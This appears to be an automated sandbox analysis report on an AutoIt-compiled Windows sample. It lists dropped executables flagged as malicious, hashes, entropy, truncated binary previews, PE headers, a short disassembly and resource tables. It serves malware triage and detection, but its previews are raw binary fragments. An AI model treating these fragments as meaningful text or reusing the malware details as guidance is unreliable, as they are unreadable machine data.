Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

Process: C:\Windows\System32\alg.exe
File Type: data
Category: dropped
Size (bytes): 12320
Entropy (8bit): 7.986164499471079
Encrypted: false
SSDEEP: 384:fA0qHKDPINMlxfvoJomwkNJE5Qwh9SZKS3MW7AaM7:I0qHKcNwxfAJo1krEOWSZKuMWR6
MD5: 36AA8CBAA7D84D85D44BD1345F338C74
SHA1: 1368A38874DEC7A036C3617C048F0B1391B0623F
SHA-256: D78360D7987C18D4CFAAD273E67D48AAE14967594AC74E2D3CC5AC02B08AEB79
SHA-512: DA6DBF5703E5DA7FE11849013FC0C7495C6C5DFC1F373E963A62E9F0825BD92B439E6E5F11293EE7AC967B721CCE1710FE7E9984DA6DF1914229302CA5DBEEE2
Malicious: false
Reputation: unknown
Preview: ..:.............ZH.?..Qo..A...a......(.......8..,1DgF......K..!.4.".6.iEJ`8.1.cdk..........+n............Y.X.$...X..._....xL.k...+..e.........Mb..$.5.^.....SW.b.W.8O..\.x...1...4....[..>.._.....p..V]mM".....^....../..0.6....9jvx..?oZ..4..W.s.G.].* .?..9..|P...ap.}>.......U...x.\.T...E2......b.|..n..Q.P@....."...v...S.W..6.XB...c'+fe^.Y......d....7.......$... ..l......:+&`w...W..]....E....|.....o.........f..?.......C..=..Y....W..Tx=.A.).C...b.,...........R.....#.2..x.p......043.................b>...a.....hF.".-:D=g[)^......._,.e......uD>V..&.......f#..[..<.......+7e.....^K]....'r.$$I..A.W.P.....;.,...{.....~.......'\K..).\.~.|6......[..7.HcO..1.2.....U.6PEs...!..@{Ibi....o..........Y....).{r.....?*..#. ..1.X.e..bBT....9a.'..0p\'bO35.d$;"..t....3.b.0........G.$...+.-O..%.....R.......:b*..l.o{.g....=.S:_HOH<2Y...0.?*...P"@.....:..H.@.\g&....Q%..zx..<+^...4..P.S......1X1L.)F..{.0.,R....X.i....X...D...$...E,Cs..'.+):H.....%>..x!d...#P

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1278464
Entropy (8bit): 5.142977084224839
Encrypted: false
SSDEEP: 12288:MjkyJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:MIyJsqjnhMgeiCl7G0nehbGZpbD
MD5: B997E00A6861615E066CA0DA6FBA54A6
SHA1: CD09A7964ACB6B668337CD1B3933DF89F14534A2
SHA-256: 79D60435826469A9B2FA59FE0F1365B268AF50DC4A09657444187413BBF582DC
SHA-512: C992409CD9ADBBDA4906E373618F31871AB45D387BD00966B146B0AFB200718D372D4EA16BCB8F1F5F029125BFA2F146DD5E5CA646089B6760DE58B3D4BB0278
Malicious: true
Reputation: unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@......................................... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...P.......@...B..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1199616
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.083889667221645
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:44DXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:HXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EF1A1266557C38137083D0B38710C3D1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FF9B259B23BF2FDB1CFCFE636B4A7DE240E5CA40
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0262814A731BA1E1D2D271100BE3E30EA206703F2C2D17D8074B33A674FD8A3A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:34167E25E146FAEFE97EB24FC3CDFF0D0D92897AFE75553AF15A1081006933F5A90E01F4A6E00AB3128F3FF449CBC805B1755E5C668D4EF94B99DB026896C7C8
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.......................................... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...P...`...@..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1146880
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.027570823121208
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:H9TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:579893F6B0B6C9ED87C94C25F4EDC7E0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:542199E1157497391239597732CB73A26183D359
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:093D232FFDE45BFE9D2AE0CA94852FED4B5FEB548C763D8964A13A6B4AC2908E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7DB4957666309D0DE81BC42816A7EE9DA8A8A5D2EEC406A4B7F40FD08D947864824CF36D70E27758344C41D7D5F04204B9115515D329B5C12B9B0D480C24540C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................\..... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1303552
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.171564843079219
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:ZZ0FxT1UoYr99GdcpK6sqjnhMgeiCl7G0nehbGZpbD:HwWcODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2DBE73EC9F3D022F74934054582A8EBA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ECE2149B4E316BD2620B5CC8B623C0D90FBABD9F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8D1E9B63814AB2F3E9C342BFD96C237D05966A99AEE4A8CA23B822CE004B8084
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7CFF31DD6D58E04C230BD15827D3EBDBAC9674435E5B5C9901D8E20F770821CF7F6BB0D95B8AB7565420A8EE03EB6081C5C51E596627CDD384675C73CCECF5A3
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@............ .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1339392
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.269293086961545
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wyoKo2fRple9pxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:wyocJApxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F7D150C9FF658CB1BEF82A58FD6540C5
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9669450A7B7A8709460867DACBBBE59D691503C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BC0D18BF96708838B4905AA702F096A6CDB05F5619DF8A8B85F120F355B87424
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:40AFB208518A916D821DEBE24918BFB64C4514CCF8459700FA53BC48419BB0E2DDDA9584990462A2AD28BFD421376D9A6195DA352B242D089AC9173C926A55CB
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.....................................A.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...P...p...@...0..............@...........................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2164736
Entropy (8bit):7.062032778087064
Encrypted:false
SSDEEP:49152:lWcnPqQUGpuphwC0DNLDpaRFXrLuWGMKCIK5Dmg27RnWGj:V0zuNIlD527BWG
MD5:C0B66BD1EE3D66E90E2046376956878E
SHA1:30AFFC1D608E028366621BEC3178A6EE2E9D6E5E
SHA-256:CB06B6C19647EC952244FE9AE43EDEF2D20B1F5FE3B18F2359BD5B28EA2396C6
SHA-512:5B4AE850D22A02BA417B34339218F21B8012615B73182FA5264C0BD94E8DBC755495F672DBEFC83996BE2D435AF62341589CE39EBA5C545F661CF247750948A2
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.....y.!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09998659877429462
Encrypted:false
SSDEEP:6:sbs1K3l/k/uMclF6vMclFq5zzT1pKlHNOn+SkUeYDwDzym+s1zj:sbEKV/kqF69Fq5zzRetO+pawHym+Ev
MD5:A1C1459EF94B259D659C1E2AE9035B73
SHA1:E52DC2460560C4B4C859A64E69651A2C966C637A
SHA-256:285CD4C9D897BC582782CC6A305A31ACBCC1AB23A4544CA68B64583A7F4BAC57
SHA-512:6CC3021F89896A793E64DAC58FF7675854DE47B8C628026F462B4780009A6F61C262AD59ABEEE9BE11F9B4E4F4A50E64A9F268729DCEF37B187FCD6081CA878C
Malicious:false
Reputation:unknown
Preview:....`...`.......................................`...!...........................................................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W..............>AR4./..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.10170015688725025
Encrypted:false
SSDEEP:12:Vl6DLiEKV/kqF69Fq5zzRnTnX+pawHyqLiEn:Vl6DLiz81MnX+pBHyqLic
MD5:8465369A0D518AF138B6B31A66920AAA
SHA1:2D1E55619753FB0951A4A9C2163E38E4162C3185
SHA-256:C691C6E9A568831274219BD809DC0775DD6E8B460BDBB9BFDE46ABDE50C7D8D2
SHA-512:0F3FD1E527233E49D3F6AACFBDE8141E812ED2CEA489E1CC5005BA110063191ADCF334A729B538C6C70F1EF5A5A9B8DD14D82AE724B88D07997AC66D3179BA47
Malicious:false
Reputation:unknown
Preview:....h...h.......................................h...!...................................y.......................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W................S4./..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.........y...............................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09915860906857822
Encrypted:false
SSDEEP:6:u5Gas1K3Nk/uMclF6vMclFq5zzT1pZ+HNIn+SkUeYDwDzyjas1zr:uYaEK9kqF69Fq5zzRf+tI+pawHyjaE3
MD5:DC62B175B2A073AE3CB4EF4CA1A033EF
SHA1:DC3C1C41AAE4D9B1DDEB9994A3E79055BAA8A8D3
SHA-256:BDE61401CD0D03AF9575CA04D6D86B603CD38319A98EE4636584A0CCA77A5E51
SHA-512:FE7C6927A0780791019B390882B134ACE89E2FC92064A12DDDE87B5C2E0186DFB6B5F1FF70B1BA57286A49A27C525C3D7BCCADD9B3D3D8FAF9BE21772FA4B268
Malicious:false
Reputation:unknown
Preview:....X...X.......................................X...!...........................................................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................W................R4./..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\timeout.exe
File Type:ASCII text, with CRLF line terminators, with overstriking
Category:dropped
Size (bytes):66
Entropy (8bit):4.524640141725149
Encrypted:false
SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:04A92849F3C0EE6AC36734C600767EFA
SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:false
Reputation:unknown
Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                                                                                                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.946127130834606
                                                                                                                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                                                                                                                                                                                                                                                                                                              • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                                                                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                                                                                                              File name:AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File size:5'301'537 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:fe364f6ff698a792c2f9527120136202
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:f3b1c3a44b03ee27911de7a7016ee29865765788
                                                                                                                                                                                                                                                                                                                                                                                                              SHA256:78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA512:a9e1032e27c752460cbeb7e21250525ba6a282407b14aac347808b066969994e1e39e826f88d705a779cad6ee620c44d3cf560ce5d833e658590652f216a40bd
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:f3v+7w8pnbzgN2H+UDPQX8Wy0ARfldMd9wIF7h0oA+InyclI6EhbCXYoVOO:ff+VU2eUDPQX8Wy3RLMd9h90oLqlCZC/
                                                                                                                                                                                                                                                                                                                                                                                                              TLSH:AF362312B3C680B7D8A339752A3FE327AB3575154327C88B97E12E779E11141DB363A2
                                                                                                                                                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                                                                                                                                                                                                                                                                                                                                              Icon Hash:1733312925935517
                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint:0x416310
                                                                                                                                                                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                                                                                                              Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                                                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                              Import Hash:aaaa8913c89c8aa4a5d93f06853894da
Instruction
call 00007FA30127B12Ch
jmp 00007FA30126EEFEh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FA30126F08Ah
cmp edi, eax
jc 00007FA30126F22Ah
cmp ecx, 00000100h
jc 00007FA30126F0A1h
cmp dword ptr [004A94E0h], 00000000h
je 00007FA30126F098h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FA30126F08Ah
pop esi
pop edi
pop ebp
jmp 00007FA30126F4EAh
test edi, 00000003h
jne 00007FA30126F097h
shr ecx, 02h
                                                                                                                                                                                                                                                                                                                                                                                                              and edx, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F0ACh
                                                                                                                                                                                                                                                                                                                                                                                                              rep movsd
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416494h+edx*4]
                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                                                                                                                                                                              mov edx, 00000003h
                                                                                                                                                                                                                                                                                                                                                                                                              sub ecx, 04h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F08Eh
                                                                                                                                                                                                                                                                                                                                                                                                              and eax, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              add ecx, eax
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [004163A8h+eax*4]
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [004164A4h+ecx*4]
                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                              jmp dword ptr [00416428h+ecx*4]
                                                                                                                                                                                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                                                                                                                                                                                              mov eax, E4004163h
                                                                                                                                                                                                                                                                                                                                                                                                              arpl word ptr [ecx+00h], ax
                                                                                                                                                                                                                                                                                                                                                                                                              or byte ptr [ecx+eax*2+00h], ah
                                                                                                                                                                                                                                                                                                                                                                                                              and edx, ecx
                                                                                                                                                                                                                                                                                                                                                                                                              mov al, byte ptr [esi]
                                                                                                                                                                                                                                                                                                                                                                                                              mov byte ptr [edi], al
                                                                                                                                                                                                                                                                                                                                                                                                              mov al, byte ptr [esi+01h]
                                                                                                                                                                                                                                                                                                                                                                                                              mov byte ptr [edi+01h], al
                                                                                                                                                                                                                                                                                                                                                                                                              mov al, byte ptr [esi+02h]
                                                                                                                                                                                                                                                                                                                                                                                                              shr ecx, 02h
                                                                                                                                                                                                                                                                                                                                                                                                              mov byte ptr [edi+02h], al
                                                                                                                                                                                                                                                                                                                                                                                                              add esi, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              add edi, 03h
                                                                                                                                                                                                                                                                                                                                                                                                              cmp ecx, 08h
                                                                                                                                                                                                                                                                                                                                                                                                              jc 00007FA30126F04Eh
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                                                                                                                                                                                                                                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                                                                                                                                                                                                                                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                                                                                                                                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                                                                                                                                                                                                                                                                                                              RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
